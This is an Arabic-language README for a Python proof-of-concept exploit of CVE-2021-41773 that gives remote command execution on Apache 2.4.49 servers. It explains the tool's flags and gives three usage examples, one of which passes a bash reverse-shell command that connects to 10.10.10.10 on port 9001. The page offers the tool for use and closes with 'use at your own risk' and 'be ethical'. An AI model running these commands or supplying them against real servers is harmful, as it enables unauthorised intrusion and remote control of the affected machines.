
# استغلال Python لإثبات المفهوم لـ CVE-2021-41773، يتيح تنفيذ الأوامر عن بُعد على خوادم Apache 2.4.49 مع خيارات مخصصة للأوامر والمنافذ.
PoC لـ CVE-2021-41773، حيث أنني وجدت للتو استغلالات معقدة أكثر من اللازم، وهذا يؤدي مباشرة إلى تنفيذ الأوامر عن بُعد.
فقط حدد عنوان الـ IP الخاص بالخادم المعرّض للثغرة Apache 2.4.49 باستخدام -i والأمر النظامي المطلوب باستخدام -c. إذا كان خادم الويب لا يعمل على المنفذ 80 فيمكننا تحديده باستخدام -p، وإذا كان خادم الويب يستخدم HTTPs فستحتاج إلى استخدام علم --use-https.
$ python3 CVE-2021-41773.py -i 10.10.10.10 -c 'id'
$ python3 CVE-2021-41773.py -i example.com -p 8080 -c '/bin/bash -c "/bin/bash -i >& /dev/tcp/10.10.10.10/9001 0>&1"'
$ python3 CVE-2021-41773.py -i 20.20.20.20 -p 443 --use-https -c 'whoami'
استخدمه على مسؤوليتك الخاصة (:
كن أخلاقيًا.